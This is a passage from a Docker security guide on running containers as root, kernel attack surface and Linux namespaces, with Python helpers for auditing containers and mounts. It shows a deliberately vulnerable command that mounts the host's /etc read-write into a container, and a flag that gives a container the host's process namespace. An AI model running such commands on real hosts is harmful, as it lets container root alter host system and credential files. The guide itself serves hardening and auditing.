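# Values of Config.User treated as root. An empty string means no user was
# set, so the container falls back to root. Including the explicit forms
# below is an assumption of this sketch.
ROOT_USERS = {"", "root", "0", "0:0", "root:root"}


def containers_running_as_root(inspect_json: str) -> List[str]:
    """Return the Ids of containers whose configured user is root."""
    containers = json.loads(inspect_json)
    return [
        c["Id"]
        for c in containers
        if c.get("Config", {}).get("User", "") in ROOT_USERS
    ]


if __name__ == "__main__":
    # Hypothetical sample shaped like the output of `docker inspect <id> <id>`.
    sample = json.dumps([
        {"Id": "aaa111", "Config": {"User": ""}},
        {"Id": "bbb222", "Config": {"User": "1000:1000"}},
    ])
    print(containers_running_as_root(sample))
```

Note that this only reports what was configured when the container was created. A process inside the container may still change user at runtime.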

Docker Host, Engine and Containers

Considering these processes run as root, and have indirect access to most of the Linux Kernel (20+ million lines of code written by humans) APIs such as networking, USB, storage stacks, and others via System calls, the situation may look bleak.



System calls are how programmes access the kernel to perform tasks. This attack surface is huge, and all before any security is added on top in the form of LXC, or libcontainer (now opencontainers/runc), or Linux Security Modules (LSM) such as AppArmor or SELinux, which are often seen as an annoyance and just disabled like many other forms of security.

If you run a container (you may have to install kmod first), then run lsmod both in the container and on the host system, you will see that the same modules are loaded. This is because, as mentioned, the container shares the host kernel, so there is not a lot between processes within the container and the host kernel. Considering that, as mentioned above, the processes within the container may also be running as root, it will pay to get a good understanding of the security features Docker provides and how to employ them.

The Seccomp section below discusses Docker's attempt to put a stop to some system calls accessing the kernel APIs. There are also many other features that Docker has added or leveraged in terms of mitigating a lot of this potential abuse. So although the situation initially looks bad, Docker has done a lot to improve it.

As you can see in the above image, the host kernel is open to receiving potential abuse from containers. Make sure you keep it patched. We will now walk through many areas of potential abuse. The countermeasures sections offer information, advice, and techniques for further improving Docker security.

Namespaces

The first place to read for solid background on Linux kernel namespaces is the man page, otherwise I would just have to repeat what is there. A lot of what follows around namespaces requires some knowledge from the namespaces man page, so do yourself a favour and read it first.

Linux kernel namespaces started to be added between 2.6.15 (January 2006) and 2.6.26 (July 2008).

According to the namespaces man page, the /proc/[pid]/ns entries for the IPC, network and UTS namespaces have been available since kernel version 3.0, those for the mount, PID and user namespaces since kernel version 3.8 (February 2013), and the entry for the cgroup namespace since kernel version 4.6 (May 2016).

Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
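You can observe this separation from the host. On Linux, every process has a directory `/proc/<pid>/ns` containing one symbolic link per namespace type, and the link target (for example `pid:[4026531836]`) identifies the namespace. Two processes share a namespace when their targets are identical. The Python below is a small sketch of that comparison; the function names are mine, and reading the links of another user's process generally requires root.

```python
import os
from typing import Dict, List


def namespace_ids(pid: str = "self", proc_root: str = "/proc") -> Dict[str, str]:
    """Map each namespace type (mnt, pid, net, ...) to its identifier.

    Each entry under <proc_root>/<pid>/ns is a symbolic link whose target
    names the namespace the process belongs to.
    """
    ns_dir = os.path.join(proc_root, pid, "ns")
    return {
        name: os.readlink(os.path.join(ns_dir, name))
        for name in sorted(os.listdir(ns_dir))
    }


def shared_namespaces(a: Dict[str, str], b: Dict[str, str]) -> List[str]:
    """Return the namespace types for which two processes have the same id."""
    return sorted(name for name in a.keys() & b.keys() if a[name] == b[name])


if __name__ == "__main__":
    # Linux only: print the namespaces of the current process.
    for ns_type, ns_id in namespace_ids().items():
        print(ns_type, ns_id)
```

To compare a container with its host, pass the container's host-side process id (for example the value of `.State.Pid` from `docker inspect`) to `namespace_ids` and compare the result with that of a host process such as PID 1.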

Docker leverages Linux kernel namespaces, each of which wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of that resource. When a container is run, Docker creates a set of namespaces for that container, providing a layer of isolation between containers:

-

mnt: (Mount) Provides filesystem isolation by managing filesystems and mount points. The `mnt` namespace allows a container to have its own isolated set of mounted filesystems. The propagation mode can be one of the following: `[r]shared`, `[r]slave` or `[r]private`. The `r` means recursive.

If you run the following command, then the host's mounted `host-path` is shared with all others that mount `host-path`. Any changes made to the mounted data will be propagated to those that use the `shared` mode propagation. Using `slave` means only the master (`host-path`) is able to propagate changes, not vice-versa. Using `private`, which is the default, will ensure no changes can be propagated.

Mounting volumes in shared mode propagation

    docker run <run arguments> --volume=[host-path:]<container-path>:[z][r]shared <container image name or id> <command> <args...>

If you omit the `host-path` you can see the host path that was mounted by running the following command:

Query

    docker inspect <name or id of container>

Find the “Mounts” property in the JSON produced. It will have a “Source” and “Destination” similar to:

Result

    ...
    "Mounts": [
      {
        "Name": "<container id>",
        "Source": "/var/lib/docker/volumes/<container id>/_data",
        "Destination": "<container-path>",
        "Mode": "",
        "RW": true,
        "Propagation": "shared"
      }
    ]
    ...

An empty string for Mode means it is set to its default of read-write. This means, for example, that a container can mount sensitive host system directories such as `/`, `/boot`, `/etc` (as seen in Review Password Strategies), `/lib`, `/proc`, `/sys`, along with the rest discussed in the Lock Down the Mounting of Partitions section, if that advice was not followed. If it was followed, you have some defence in depth working for you: although Docker may have mounted a directory as read-write, the underlying mount may be read-only, thus stopping the container from being able to modify files in these locations on the host system. If the host does not have the above directories mounted with constrained permissions, then we are relying on the user that runs any given Docker container mounting a sensitive host volume to mount it as read-only. For example, after the following command has been run, users within the container can modify files in the host's `/etc` directory:

Vulnerable mount

    docker run -it --rm -v /etc:/hosts-etc --name=lets-mount-etc ubuntu

Query

    docker inspect -f "{{ json .Mounts }}" lets-mount-etc

Result

    [{"Type":"bind","Source":"/etc","Destination":"/hosts-etc","Mode":"","RW":true,"Propagation":""}]

Also keep in mind that by default the user in the container, unless otherwise specified, is root, and that is the same root user that is on the host system.
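The read-write check described above can be sketched in Python as follows. This is a minimal illustration rather than a complete audit: the function name and the path matching rule are my assumptions, the list of directories is the one named in the text, and the input is the JSON printed by the `.Mounts` query above.

```python
import json
from typing import List

# Sensitive host directories named in the text; extend to suit your hosts.
SENSITIVE = ("/", "/boot", "/etc", "/lib", "/proc", "/sys")


def risky_mounts(mounts_json: str) -> List[str]:
    """Return the Source of every read-write mount of a sensitive host path."""
    risky = []
    for mount in json.loads(mounts_json):
        source = mount.get("Source", "")
        # Match the directory itself or anything beneath it. "/" is matched
        # only exactly, otherwise every path would be flagged.
        is_sensitive = any(
            source == d or (d != "/" and source.startswith(d + "/"))
            for d in SENSITIVE
        )
        if is_sensitive and mount.get("RW", False):
            risky.append(source)
    return risky


if __name__ == "__main__":
    # The result of the vulnerable mount query shown in the text.
    result = (
        '[{"Type":"bind","Source":"/etc","Destination":"/hosts-etc",'
        '"Mode":"","RW":true,"Propagation":""}]'
    )
    print(risky_mounts(result))
```

The sketch only looks at what Docker reports. It cannot tell whether the underlying host mount is itself read-only, so treat a hit as something to investigate rather than as a confirmed exposure.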

Labelling systems such as Linux Security Modules (LSM) require that the contents of a volume mounted into a container be labelled. This can be done by adding the `z` (as seen in the above example) or `Z` suffix to the volume mount. The `z` suffix instructs Docker that you intend to share the mounted volume with other containers, and in doing so, Docker applies a shared content label. Alternatively, if you provide the `Z` suffix, Docker applies a private unshared label, which means only the current container can use the mounted volume. Further details can be found in the dockervolumes documentation. This is something to keep in mind if you are using LSM and have a process inside your container that is unable to use the mounted data.

`--volumes-from` allows you to specify a data volume from another container.

You can also mount your Docker container mounts on the host by doing the following:

    mount --bind /var/lib/docker/<volumes>/<container id>/_data </path/on/host>

-

PID: (Process ID) Provides process isolation, separating container processes from host and other container processes.

The first process that is created in a new `PID` namespace is the “init” process with `PID` 1, which assumes parenthood of the other processes within the same `PID` namespace. When `PID` 1 is terminated, so are the rest of the processes within the same `PID` namespace.

`PID` namespaces are hierarchically nested in ancestor-descendant relationships to a depth of up to 32 levels. All `PID` namespaces have a parent namespace, other than the initial root `PID` namespace of the host system. That parent namespace is the `PID` namespace of the process that created the child namespace.

Within a `PID` namespace, it is possible to access (make system calls to specific `PID`s) all other processes in the same namespace, as well as all processes of descendant namespaces. However, processes in a child `PID` namespace cannot see processes that exist in the parent `PID` namespace or further removed ancestor namespaces. The direction in which any process can access another process in an ancestor/descendant `PID` namespace is one way.

Processes in different `PID` namespaces can have the same `PID`, because the `PID` namespace isolates the `PID` number space from other `PID` namespaces.

Docker takes advantage of `PID` namespaces. Just as you would expect, a Docker container cannot access the host system processes, and process ids that are used in the host system can be reused in the container, including `PID` 1, by being reassigned to a process started within the container. The host system can however access all processes within its containers because, as stated above, `PID` namespaces are hierarchically nested in parent-child relationships. Processes in the host's `PID` namespace can therefore access all processes in their own namespace down to the `PID` namespace that was responsible for starting the process, which in our case is the process within the container.

The default behaviour can however be overridden to allow a container to access processes within a sibling container, or the host's `PID` namespace. Example:

Syntax

    --pid=[container:<name|id>],[host]

Example

    # Provides access to the `PID` namespace of container called myContainer
    # for container created from myImage.
    docker run --pid=container:myContainer myImage

Example

    # Provides access to the host `PID` namespace for container created from myImage
    docker run --pid=host myImage

As an aside, `PID` namespaces give us the functionality of: “suspending/resuming the set of processes in the container and migrating the container to a new host while the processes inside the container maintain the same PIDs.” with a handful of commands:

Example

    docker container pause myContainer [mySecondContainer...]
    docker export [options] myContainer
    # Move your container to another host.
    docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
    docker container unpause myContainer [mySecondContainer...]

-

net: (Networking) Provides network isolation by managing the network stack and interfaces. It is also essential to allow containers to communicate with the host system and other containers. Network namespaces were introduced into the kernel in 2.6.24 (January 2008), and after an additional year of development they were considered largely done. The only real concern here is understanding the Docker network modes and communication between containers. This is discussed in the Countermeasures.

-

UTS: (Unix Timesharing System) Provides isolation of kernel and version identifiers.

Time-sharing is the sharing of a computing resource among many users, a concept introduced in the 1960s/1970s.

A UTS namespace is the set of identifiers returned by `uname`, which include the hostname and the NIS domain name. Any processes which are not children of the process that requested the clone will not be able to see any changes made to the identifiers of the UTS namespace.

If the `CLONE_NEWUTS` constant is set, then the process being created will be created in a new UTS namespace with the hostname and NIS domain name copied and able to be modified independently from the UTS namespace of the calling process.

If the `CLONE_NEWUTS` constant is not set, then the process being created will be created in the same UTS namespace as the calling process, and is thus able to change the identifiers returned by `uname`.

When a container is created, a UTS namespace is copied (`CLONE_NEWUTS` is set) (`--uts=""`) by default, providing a UTS namespace that can be modified independently from the target UTS namespace it was copied from.

When a container is created with `--uts="host"`, a UTS namespace is inherited from the host, and the `--hostname` flag is invalid.

-